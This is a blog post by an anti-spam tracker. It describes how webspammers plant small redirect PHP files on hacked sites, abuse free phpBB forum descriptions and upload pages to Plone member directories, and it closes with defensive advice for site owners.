While tracking webspammers, I’ve seen more and more use of redirects from whatever webservice the spammers can utilize. That includes Blogspot, free phpBB forum sites, Plone, and even hacked websites.
Basically, whatever they can use, they will.
We’re getting used to free services being used for redirects, but when they start turning our own websites against us, it’s time to wake up.
Vizaweb webhosting warned their customers recently that hackers had been sniffing FTP passwords. Customers were directed to only use secure ways to log in, and to change their passwords. Lots of them didn’t, and got their websites broken into. The normal operation of the websites didn’t change, so the website owners had no idea anything was wrong. In the meantime, the hackers had placed php files in existing directories off the root that served up spammy redirect pages using includes (pulling the content in from the spammer’s site). The php files were about 1 Kb small, so easy to overlook. They’d be named read.php, wp-read.php, rss.php or something else innocuous. Some scripts even included code to suppress any errors generated. The files would be called with keywords added (?q=keyword) that created the spammy redirect files. The spammers led search engines to these files by comment spamming guestbooks and blogs. Suddenly the spammers had redirect files on (maybe) high PR sites or even authority sites. Sites that were previously above reproach.
We found the spammers through the cutouts they redirected through (on the way to PPC programs), and through reading the raw php files supplied by the website owners. One even told us his root index.php file had been replaced. As far as we could tell from casual inspection, the doctored index.php file was calling up a Webattacker installation. The site thus compromised was a busy community site…
Free phpBB forums
There’s a jungle of free phpBB forum services out there, and the spammers have figured out a way to make redirects. They insert code in the forum descriptions. That way the redirect works from the front page of the forum. Luckily, there’s an easy solution that all free phpBB forum providers can implement (and many have), discovered by Pickaforum’s admin:
(note, this was squished together to make the graphic. The code is on one line)
The developers of Plone have released new versions and encourage users to upgrade. I’d like to add that if I had a Plone installation, I’d prepare a robots.txt file that directed search engine spiders to not go near the Member directory. That way, if the spammers managed to upload spammy pages – redirects or not, they wouldn’t embarass me in the search engines.
Never ending arms race
The spammers are continually looking for susceptible software and web services they can use to redirect. They try to stay two steps ahead of us.
We recently had a long discussion with a bunch of spammers. They see us “antis” as deplorable human beings who persecute them for no reason. They seeem to think what they’re doing is laudable. Basically, they’ll continue looking for ways to turn our websites against us, in the race to earn money for their “starving children”. The spamming is not going to stop.
So check your site statistics for anything unusual, check your raw logs, and upgrade your php apps regularly.